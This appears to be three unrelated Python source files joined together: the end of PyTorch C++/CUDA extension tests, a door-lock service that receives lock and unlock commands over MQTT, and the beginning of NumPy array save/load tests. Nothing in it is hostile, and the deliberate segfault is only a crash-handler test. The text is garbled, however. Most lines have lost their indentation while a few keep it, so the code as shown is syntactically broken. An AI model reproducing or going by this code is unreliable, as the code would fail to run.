verbose=True,
build_directory=temp_dir,
)
# Expected output for --list-elf:
# ELF file 1: cudaext_archflags.1.sm_61.cubin
# ELF file 2: cudaext_archflags.2.sm_52.cubin
_check_cuobjdump_output(expected[0])
if expected[1] is not None:
# Expected output for --list-ptx:
# PTX file 1: cudaext_archflags.1.sm_61.ptx
_check_cuobjdump_output(expected[1], is_ptx=True)
finally:
if IS_WINDOWS:
print("Not wiping extensions build folder because Windows")
else:
shutil.rmtree(temp_dir)
if old_envvar is None:
os.environ.pop('TORCH_CUDA_ARCH_LIST')
else:
os.environ['TORCH_CUDA_ARCH_LIST'] = old_envvar
@unittest.skipIf(not TEST_CUDA, "CUDA not found")
@unittest.skipIf(TEST_ROCM, "disabled on rocm")
def test_jit_cuda_archflags(self):
# Test a number of combinations:
# - the default for the machine we're testing on
# - Separators, can be ';' (most common) or ' '
# - Architecture names
# - With/without '+PTX'
n = torch.cuda.device_count()
capabilities = {torch.cuda.get_device_capability(i) for i in range(n)}
# expected values is length-2 tuple: (list of ELF, list of PTX)
# note: there should not be more than one PTX value
archflags = {
'': (['{}{}'.format(capability[0], capability[1]) for capability in capabilities], None),
"Maxwell+Tegra;6.1": (['53', '61'], None),
"Pascal 3.5": (['35', '60', '61'], None),
"Volta": (['70'], ['70']),
}
if int(torch.version.cuda.split('.')[0]) >= 10:
# CUDA 9 only supports compute capability <= 7.2
archflags["7.5+PTX"] = (['75'], ['75'])
archflags["5.0;6.0+PTX;7.0;7.5"] = (['50', '60', '70', '75'], ['60'])
for flags, expected in archflags.items():
self._run_jit_cuda_archflags(flags, expected)
@unittest.skipIf(not TEST_CUDNN, "CuDNN not found")
def test_jit_cudnn_extension(self):
# implementation of CuDNN ReLU
if IS_WINDOWS:
extra_ldflags = ["cudnn.lib"]
else:
extra_ldflags = ["-lcudnn"]
module = torch.utils.cpp_extension.load(
name="torch_test_cudnn_extension",
sources=["cpp_extensions/cudnn_extension.cpp"],
extra_ldflags=extra_ldflags,
verbose=True,
with_cuda=True,
)
x = torch.randn(100, device="cuda", dtype=torch.float32)
y = torch.zeros(100, device="cuda", dtype=torch.float32)
module.cudnn_relu(x, y) # y=relu(x)
self.assertEqual(torch.nn.functional.relu(x), y)
with self.assertRaisesRegex(RuntimeError, "same size"):
y_incorrect = torch.zeros(20, device="cuda", dtype=torch.float32)
module.cudnn_relu(x, y_incorrect)
def test_inline_jit_compile_extension_with_functions_as_list(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_with_functions_list",
cpp_sources=cpp_source,
functions="tanh_add",
verbose=True,
)
self.assertEqual(module.tanh_add.__doc__.split("\n")[2], "tanh_add")
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.tanh_add(x, y)
self.assertEqual(z, x.tanh() + y.tanh())
def test_inline_jit_compile_extension_with_functions_as_dict(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_with_functions_dict",
cpp_sources=cpp_source,
functions={"tanh_add": "Tanh and then sum :D"},
verbose=True,
)
self.assertEqual(module.tanh_add.__doc__.split("\n")[2], "Tanh and then sum :D")
def test_inline_jit_compile_extension_multiple_sources_and_no_functions(self):
cpp_source1 = """
torch::Tensor sin_add(torch::Tensor x, torch::Tensor y) {
return x.sin() + y.sin();
}
"""
cpp_source2 = """
#include <torch/extension.h>
torch::Tensor sin_add(torch::Tensor x, torch::Tensor y);
PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) {
m.def("sin_add", &sin_add, "sin(x) + sin(y)");
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension",
cpp_sources=[cpp_source1, cpp_source2],
verbose=True,
)
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.sin_add(x, y)
self.assertEqual(z, x.sin() + y.sin())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_inline_jit_compile_extension_cuda(self):
cuda_source = """
__global__ void cos_add_kernel(
const float* __restrict__ x,
const float* __restrict__ y,
float* __restrict__ output,
const int size) {
const auto index = blockIdx.x * blockDim.x + threadIdx.x;
if (index < size) {
output[index] = __cosf(x[index]) + __cosf(y[index]);
}
}
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y) {
auto output = torch::zeros_like(x);
const int threads = 1024;
const int blocks = (output.numel() + threads - 1) / threads;
cos_add_kernel<<<blocks, threads>>>(x.data<float>(), y.data<float>(), output.data<float>(), output.numel());
return output;
}
"""
# Here, the C++ source need only declare the function signature.
cpp_source = "torch::Tensor cos_add(torch::Tensor x, torch::Tensor y);"
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_cuda",
cpp_sources=cpp_source,
cuda_sources=cuda_source,
functions=["cos_add"],
verbose=True,
)
self.assertEqual(module.cos_add.__doc__.split("\n")[2], "cos_add")
x = torch.randn(4, 4, device="cuda", dtype=torch.float32)
y = torch.randn(4, 4, device="cuda", dtype=torch.float32)
z = module.cos_add(x, y)
self.assertEqual(z, x.cos() + y.cos())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_inline_jit_compile_custom_op_cuda(self):
cuda_source = """
__global__ void cos_add_kernel(
const float* __restrict__ x,
const float* __restrict__ y,
float* __restrict__ output,
const int size) {
const auto index = blockIdx.x * blockDim.x + threadIdx.x;
if (index < size) {
output[index] = __cosf(x[index]) + __cosf(y[index]);
}
}
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y) {
auto output = torch::zeros_like(x);
const int threads = 1024;
const int blocks = (output.numel() + threads - 1) / threads;
cos_add_kernel<<<blocks, threads>>>(x.data_ptr<float>(), y.data_ptr<float>(), output.data_ptr<float>(), output.numel());
return output;
}
"""
# Here, the C++ source need only declare the function signature.
cpp_source = """
#include <torch/library.h>
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y);
TORCH_LIBRARY(inline_jit_extension_custom_op_cuda, m) {
m.def("cos_add", cos_add);
}
"""
torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_custom_op_cuda",
cpp_sources=cpp_source,
cuda_sources=cuda_source,
verbose=True,
is_python_module=False,
)
x = torch.randn(4, 4, device="cuda", dtype=torch.float32)
y = torch.randn(4, 4, device="cuda", dtype=torch.float32)
z = torch.ops.inline_jit_extension_custom_op_cuda.cos_add(x, y)
self.assertEqual(z, x.cos() + y.cos())
def test_inline_jit_compile_extension_throws_when_functions_is_bad(self):
with self.assertRaises(ValueError):
torch.utils.cpp_extension.load_inline(
name="invalid_jit_extension", cpp_sources="", functions=5
)
def test_lenient_flag_handling_in_jit_extensions(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="lenient_flag_handling_extension",
cpp_sources=cpp_source,
functions="tanh_add",
extra_cflags=["-g\n\n", "-O0 -Wall"],
extra_include_paths=[" cpp_extensions\n"],
verbose=True,
)
x = torch.zeros(100, dtype=torch.float32)
y = torch.zeros(100, dtype=torch.float32)
z = module.tanh_add(x, y).cpu()
self.assertEqual(z, x.tanh() + y.tanh())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_half_support(self):
"""
Checks for an issue with operator< ambiguity for half when certain
THC headers are included.
See https://github.com/pytorch/pytorch/pull/10301#issuecomment-416773333
for the corresponding issue.
"""
cuda_source = """
template<typename T, typename U>
__global__ void half_test_kernel(const T* input, U* output) {
if (input[0] < input[1] || input[0] >= input[1]) {
output[0] = 123;
}
}
torch::Tensor half_test(torch::Tensor input) {
auto output = torch::empty(1, input.options().dtype(torch::kFloat));
AT_DISPATCH_FLOATING_TYPES_AND_HALF(input.scalar_type(), "half_test", [&] {
half_test_kernel<scalar_t><<<1, 1>>>(
input.data<scalar_t>(),
output.data<float>());
});
return output;
}
"""
module = torch.utils.cpp_extension.load_inline(
name="half_test_extension",
cpp_sources="torch::Tensor half_test(torch::Tensor input);",
cuda_sources=cuda_source,
functions=["half_test"],
verbose=True,
)
x = torch.randn(3, device="cuda", dtype=torch.half)
result = module.half_test(x)
self.assertEqual(result[0], 123)
def test_reload_jit_extension(self):
def compile(code):
return torch.utils.cpp_extension.load_inline(
name="reloaded_jit_extension",
cpp_sources=code,
functions="f",
verbose=True,
)
module = compile("int f() { return 123; }")
self.assertEqual(module.f(), 123)
module = compile("int f() { return 456; }")
self.assertEqual(module.f(), 456)
module = compile("int f() { return 456; }")
self.assertEqual(module.f(), 456)
module = compile("int f() { return 789; }")
self.assertEqual(module.f(), 789)
def test_cpp_frontend_module_has_same_output_as_python(self, dtype=torch.double):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
input = torch.randn(2, 5, dtype=dtype)
cpp_linear = extension.Net(5, 2)
cpp_linear.to(dtype)
python_linear = torch.nn.Linear(5, 2).to(dtype)
# First make sure they have the same parameters
cpp_parameters = dict(cpp_linear.named_parameters())
with torch.no_grad():
python_linear.weight.copy_(cpp_parameters["fc.weight"])
python_linear.bias.copy_(cpp_parameters["fc.bias"])
cpp_output = cpp_linear.forward(input)
python_output = python_linear(input)
self.assertEqual(cpp_output, python_output)
cpp_output.sum().backward()
python_output.sum().backward()
for p in cpp_linear.parameters():
self.assertFalse(p.grad is None)
self.assertEqual(cpp_parameters["fc.weight"].grad, python_linear.weight.grad)
self.assertEqual(cpp_parameters["fc.bias"].grad, python_linear.bias.grad)
def test_cpp_frontend_module_python_inter_op(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
# Create a torch.nn.Module which uses the C++ module as a submodule.
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.x = torch.nn.Parameter(torch.tensor(1.0))
self.net = extension.Net(3, 5)
def forward(self, input):
return self.net.forward(input) + self.x
net = extension.Net(5, 2)
net.double()
net.to(torch.get_default_dtype())
self.assertEqual(str(net), "Net")
# Further embed the torch.nn.Module into a Sequential, and also add the
# C++ module as an element of the Sequential.
sequential = torch.nn.Sequential(M(), torch.nn.Tanh(), net, torch.nn.Sigmoid())
input = torch.randn(2, 3)
# Try calling the module!
output = sequential.forward(input)
# The call operator is bound to forward too.
self.assertEqual(output, sequential(input))
self.assertEqual(list(output.shape), [2, 2])
# Do changes on the module hierarchy.
old_dtype = torch.get_default_dtype()
sequential.to(torch.float64)
sequential.to(torch.float32)
sequential.to(old_dtype)
self.assertEqual(sequential[2].parameters()[0].dtype, old_dtype)
# Make sure we can access these methods recursively.
self.assertEqual(len(list(sequential.parameters())), len(net.parameters()) * 2 + 1)
self.assertEqual(len(list(sequential.named_parameters())), len(net.named_parameters()) * 2 + 1)
self.assertEqual(len(list(sequential.buffers())), len(net.buffers()) * 2)
self.assertEqual(len(list(sequential.modules())), 8)
# Test clone()
net2 = net.clone()
self.assertEqual(len(net.parameters()), len(net2.parameters()))
self.assertEqual(len(net.buffers()), len(net2.buffers()))
self.assertEqual(len(net.modules()), len(net2.modules()))
# Try differentiating through the whole module.
for parameter in net.parameters():
self.assertIsNone(parameter.grad)
output.sum().backward()
for parameter in net.parameters():
self.assertFalse(parameter.grad is None)
self.assertGreater(parameter.grad.sum(), 0)
# Try calling zero_grad()
net.zero_grad()
for p in net.parameters():
self.assertEqual(p.grad, torch.zeros_like(p))
# Test train(), eval(), training (a property)
self.assertTrue(net.training)
net.eval()
self.assertFalse(net.training)
net.train()
self.assertTrue(net.training)
net.eval()
# Try calling the additional methods we registered.
biased_input = torch.randn(4, 5)
output_before = net.forward(biased_input)
bias = net.get_bias().clone()
self.assertEqual(list(bias.shape), [2])
net.set_bias(bias + 1)
self.assertEqual(net.get_bias(), bias + 1)
output_after = net.forward(biased_input)
self.assertNotEqual(output_before, output_after)
# Try accessing parameters
self.assertEqual(len(net.parameters()), 2)
np = net.named_parameters()
self.assertEqual(len(np), 2)
self.assertIn("fc.weight", np)
self.assertIn("fc.bias", np)
self.assertEqual(len(net.buffers()), 1)
nb = net.named_buffers()
self.assertEqual(len(nb), 1)
self.assertIn("buf", nb)
self.assertEqual(nb[0][1], torch.eye(5))
def test_cpp_frontend_module_has_up_to_date_attributes(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
net = extension.Net(5, 2)
self.assertEqual(len(net._parameters), 0)
net.add_new_parameter("foo", torch.eye(5))
self.assertEqual(len(net._parameters), 1)
self.assertEqual(len(net._buffers), 1)
net.add_new_buffer("bar", torch.eye(5))
self.assertEqual(len(net._buffers), 2)
self.assertEqual(len(net._modules), 1)
net.add_new_submodule("fc2")
self.assertEqual(len(net._modules), 2)
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_cpp_frontend_module_python_inter_op_with_cuda(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
net = extension.Net(5, 2)
for p in net.parameters():
self.assertTrue(p.device.type == "cpu")
cpu_parameters = [p.clone() for p in net.parameters()]
device = torch.device("cuda", 0)
net.to(device)
for i, p in enumerate(net.parameters()):
self.assertTrue(p.device.type == "cuda")
self.assertTrue(p.device.index == 0)
self.assertEqual(cpu_parameters[i], p)
net.cpu()
net.add_new_parameter("a", torch.eye(5))
net.add_new_parameter("b", torch.eye(5))
net.add_new_buffer("c", torch.eye(5))
net.add_new_buffer("d", torch.eye(5))
net.add_new_submodule("fc2")
net.add_new_submodule("fc3")
for p in net.parameters():
self.assertTrue(p.device.type == "cpu")
net.cuda()
for p in net.parameters():
self.assertTrue(p.device.type == "cuda")
def test_returns_shared_library_path_when_is_python_module_is_true(self):
source = """
#include <torch/script.h>
torch::Tensor func(torch::Tensor x) { return x; }
static torch::RegisterOperators r("test::func", &func);
"""
torch.utils.cpp_extension.load_inline(
name="is_python_module",
cpp_sources=source,
functions="func",
verbose=True,
is_python_module=False,
)
self.assertEqual(torch.ops.test.func(torch.eye(5)), torch.eye(5))
def test_set_default_type_also_changes_aten_default_type(self):
module = torch.utils.cpp_extension.load_inline(
name="test_set_default_type",
cpp_sources="torch::Tensor get() { return torch::empty({}); }",
functions="get",
verbose=True,
)
initial_default = torch.get_default_dtype()
try:
self.assertEqual(module.get().dtype, initial_default)
torch.set_default_dtype(torch.float64)
self.assertEqual(module.get().dtype, torch.float64)
torch.set_default_dtype(torch.float32)
self.assertEqual(module.get().dtype, torch.float32)
torch.set_default_dtype(torch.float16)
self.assertEqual(module.get().dtype, torch.float16)
finally:
torch.set_default_dtype(initial_default)
def test_compilation_error_formatting(self):
# Test that the missing-semicolon error message has linebreaks in it.
# This'll fail if the message has been munged into a single line.
        # It's hard to write anything more specific as every compiler has its own
        # error formatting.
with self.assertRaises(RuntimeError) as e:
torch.utils.cpp_extension.load_inline(
name="test_compilation_error_formatting",
cpp_sources="int main() { return 0 }")
pattern = r'.*(\\n|\\r).*'
self.assertNotRegex(str(e), pattern)
def test_warning(self):
# Note: the module created from this source will include the py::key_error
# symbol. But because of visibility and the fact that it lives in a
# different compilation unit than pybind, this trips up ubsan even though
# it is fine. "ubsan.supp" thus needs to contain "vptr:warn_mod.so".
source = '''
// error_type:
// 0: no error
// 1: torch::TypeError
// 2: python_error()
// 3: py::error_already_set
at::Tensor foo(at::Tensor x, int error_type) {
std::ostringstream err_stream;
err_stream << "Error with " << x.type();
TORCH_WARN(err_stream.str());
if(error_type == 1) {
throw torch::TypeError(err_stream.str().c_str());
}
if(error_type == 2) {
PyObject* obj = PyTuple_New(-1);
TORCH_CHECK(!obj);
// Pretend it was caught in a different thread and restored here
auto e = python_error();
e.persist();
e.restore();
throw e;
}
if(error_type == 3) {
throw py::key_error(err_stream.str());
}
return x.cos();
}
'''
# Ensure double type for hard-coded c name below
t = torch.rand(2).double()
cpp_tensor_name = r"CPUDoubleType"
        # Without error handling, the warnings cannot be caught
warn_mod = torch.utils.cpp_extension.load_inline(name='warn_mod',
cpp_sources=[source],
functions=['foo'],
with_pytorch_error_handling=False)
with warnings.catch_warnings(record=True) as w:
warn_mod.foo(t, 0)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(SystemError, "bad argument to internal function"):
warn_mod.foo(t, 2)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(KeyError, cpp_tensor_name):
warn_mod.foo(t, 3)
self.assertEqual(len(w), 0)
warn_mod = torch.utils.cpp_extension.load_inline(name='warn_mod',
cpp_sources=[source],
functions=['foo'],
with_pytorch_error_handling=True)
with warnings.catch_warnings(record=True) as w:
            # Caught with no error should be detected
warn_mod.foo(t, 0)
self.assertEqual(len(w), 1)
            # Caught with cpp error should also be detected
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 2)
            # Caught with python error should also be detected
with self.assertRaisesRegex(SystemError, "bad argument to internal function"):
warn_mod.foo(t, 2)
self.assertEqual(len(w), 3)
            # Caught with pybind error should also be detected
            # Note that there is no type name translation for pybind errors
with self.assertRaisesRegex(KeyError, cpp_tensor_name):
warn_mod.foo(t, 3)
self.assertEqual(len(w), 4)
        # Make sure warnings raised as errors are handled properly
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("error")
# No error, the warning should raise
with self.assertRaisesRegex(UserWarning, t.type()):
warn_mod.foo(t, 0)
self.assertEqual(len(w), 0)
# Another error happened, the warning is ignored
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 0)
def test_autograd_from_cpp(self):
source = '''
void run_back(at::Tensor x) {
x.backward({});
}
void run_back_no_gil(at::Tensor x) {
pybind11::gil_scoped_release no_gil;
x.backward({});
}
'''
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, gx):
return gx
test_backward_deadlock = torch.utils.cpp_extension.load_inline(name='test_backward_deadlock',
cpp_sources=[source],
functions=['run_back', 'run_back_no_gil'],)
# This used to deadlock
inp = torch.rand(20, requires_grad=True)
loss = MyFn.apply(inp).sum()
with self.assertRaisesRegex(RuntimeError, "The autograd engine was called while holding the GIL."):
test_backward_deadlock.run_back(loss)
inp = torch.rand(20, requires_grad=True)
loss = MyFn.apply(inp).sum()
test_backward_deadlock.run_back_no_gil(loss)
def test_custom_compound_op_autograd(self):
# Test that a custom compound op (i.e. a custom op that just calls other aten ops)
# correctly returns gradients of those other ops
source = """
#include <torch/library.h>
torch::Tensor my_add(torch::Tensor x, torch::Tensor y) {
return x + y;
}
TORCH_LIBRARY(my, m) {
m.def("add", &my_add);
}
"""
torch.utils.cpp_extension.load_inline(
name="is_python_module",
cpp_sources=source,
verbose=True,
is_python_module=False,
)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
gradcheck(torch.ops.my.add, [a, b], eps=1e-2)
@staticmethod
def _crash_handler_test_process(stderr_file, destination):
# Code to enable dumps and trigger a segfault
if sys.platform == "win32":
destination = destination.replace("\\", "\\\\")
csrc = textwrap.dedent(f"""
#include <torch/torch.h>
#include <locale>
#include <iostream>
#include <codecvt>
#include <string>
int fail() {{
std::wstring_convert<std::codecvt_utf8_utf16<wchar_t>> converter;
std::string narrow("{destination}");
std::wstring wide = converter.from_bytes(narrow);
torch::crash_handler::enable_minidumps(wide.c_str());
volatile int* bad = nullptr;
return *bad;
}}
""")
else:
csrc = textwrap.dedent(f"""
#include <torch/torch.h>
int fail() {{
torch::crash_handler::enable_minidumps("{destination}");
volatile int* bad = nullptr;
return *bad;
}}
""")
        # Some special handling to redirect stderr for a C++ extension
# Copied from: https://stackoverflow.com/questions/8804893/redirect-stdout-from-python-for-c-calls
sys.stdout.flush()
newstdout = os.dup(2)
devnull = os.open(stderr_file, os.O_WRONLY)
os.dup2(devnull, 2)
os.close(devnull)
sys.stdout = os.fdopen(newstdout, 'w')
module = torch.utils.cpp_extension.load_inline(
name="segfault",
cpp_sources=csrc,
functions=["fail"],
)
module.fail()
@unittest.skipIf(TEST_WITH_ASAN, "ASAN disables the crash handler's signal handler")
@unittest.skipIf(not has_breakpad(), "Built without breakpad")
@unittest.skipIf(os.environ.get("TEST_CONFIG") == "force_on_cpu", "fails on force_on_cpu config, tracked w/ #65253")
def test_crash_handler(self):
with tempfile.TemporaryDirectory() as temp_dir, tempfile.NamedTemporaryFile(delete=not sys.platform == "win32") as stderr:
# Use multiprocessing to spin up a separate process to make catching
# the segfault easier
p = Process(target=self._crash_handler_test_process, args=(stderr.name, temp_dir))
p.start()
p.join()
with open(stderr.name) as f:
result = f.read().strip()
# Check that the signal handler was called
self.assertTrue(result.startswith(f"Wrote minidump to {temp_dir}"))
with open(result.replace("Wrote minidump to ", ""), "rb") as dump_file:
dump_bytes = dump_file.read()
# Check that the file has the correct magic number
self.assertEqual(b"MDMP", dump_bytes[0:4])
if __name__ == "__main__":
common.run_tests()
|
door.py
|
"""Door service module."""
from os import environ
from contextlib import contextmanager, AbstractContextManager
from typing import Callable
import logging
from threading import Thread
from time import sleep
from const import (
    COMMAND_PAYLOAD,
    STATUS_PAYLOAD,
)
build_type = environ.get('BUILD_TYPE', None)
print(f"build_type: {build_type}")
if build_type == 'release':
import gpiozero
from models import Door
else:
from models import DoorDummy as Door
logger = logging.getLogger(__name__)
class DoorService:
doors = []
mqttc = None
def __init__(self, doors_cfg: dict) -> None:
print(f"doors_cfg: {doors_cfg}")
for door, cfg in doors_cfg.items():
print(f"new_door: {door}")
if build_type == 'release':
new_door = Door(name=door, command_topic=cfg['command_topic'], state_topic=cfg['state_topic'], relay=gpiozero.OutputDevice(cfg['pin'], active_high=False, initial_value=False))
else:
new_door = Door(name=door, command_topic=cfg['command_topic'], state_topic=cfg['state_topic'], pin=cfg['pin'])
# new_door.set_relay()
self.doors.append(new_door)
self.update_status()
self.status_thread = Thread(target=self.publish_status_cyclic, daemon=True)
self.status_thread.start()
def update_status(self):
for door in self.doors:
door.update_status()
def set_mqttc(self, mqttc):
self.mqttc = mqttc
def subscribe(self):
        print("subscribing to topics")
for door in self.doors:
print(f"subscribing to topic: {door.command_topic}")
self.mqttc.subscribe(door.command_topic, qos=0)
def publish_status(self):
for door in self.doors:
if door.state != "Unknown":
self.mqttc.publish(door.state_topic, payload=door.state)
def mqtt_on_message(self, topic, payload):
print("Doormanager message: ", topic, payload)
for door in self.doors:
if topic == door.command_topic:
if payload == COMMAND_PAYLOAD.LOCK:
print(f"Doormanager message: Locking door {door}")
door.lock()
elif payload == COMMAND_PAYLOAD.UNLOCK:
print(f"Doormanager message: Unlocking door {door}")
door.unlock()
self.publish_status()
    def publish_status_cyclic(self):
        while True:
            if self.mqttc is not None:
                self.publish_status()
            sleep(300)
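# Minimal wiring sketch, guarded so it only runs when this file is executed
# directly. It assumes the paho-mqtt 1.x Client API is installed and a broker is
# reachable on localhost; topic names, the pin and the broker address are assumed
# example values, and the doors_cfg shape matches what DoorService expects above.
if __name__ == '__main__':
    import paho.mqtt.client as mqtt
    doors_cfg = {
        'garage': {
            'command_topic': 'home/garage/command',
            'state_topic': 'home/garage/state',
            'pin': 17,
        },
    }
    service = DoorService(doors_cfg)
    def on_connect(client, userdata, flags, rc):
        service.subscribe()
    def on_message(client, userdata, message):
        # DoorService compares the payload against COMMAND_PAYLOAD values;
        # decoding to str is an assumption about how those constants are defined.
        service.mqtt_on_message(message.topic, message.payload.decode())
    client = mqtt.Client()
    client.on_connect = on_connect
    client.on_message = on_message
    service.set_mqttc(client)
    client.connect('localhost')
    client.loop_forever()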
|
test_io.py
|
import numpy as np
import numpy.ma as ma
from numpy.ma.testutils import *
from numpy.testing import assert_warns
import sys
import gzip
import os
import threading
from tempfile import mkstemp, NamedTemporaryFile
import time
from datetime import datetime
from numpy.lib._iotools import ConverterError, ConverterLockError, \
ConversionWarning
from numpy.compat import asbytes, asbytes_nested, bytes
if sys.version_info[0] >= 3:
from io import BytesIO
def StringIO(s=""):
return BytesIO(asbytes(s))
else:
from StringIO import StringIO
BytesIO = StringIO
MAJVER, MINVER = sys.version_info[:2]
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = StringIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = StringIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
                except OSError as err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
                   for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = StringIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
asbytes_nested(
[(fmt + ' ' + fmt + '\n') % (1, 2),
(fmt + ' ' + fmt + '\n') % (3, 4)]))
a = np.array([[1, 2], [3, 4]], int)
c = StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['1 2\n', '3 4\n']))
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested(['1\n', '2\n', '3\n', '4\n']))
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['1 2\n', '3 4\n']))
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = StringIO()
np.savetxt(c, a, delimiter=asbytes(','), fmt='%d')
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['1,2\n', '3,4\n']))
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = StringIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['01 2.0\n', '03 4.0\n']))
# A single multiformat string
c = StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested(['01 : 2.0\n', '03 : 4.0\n']))
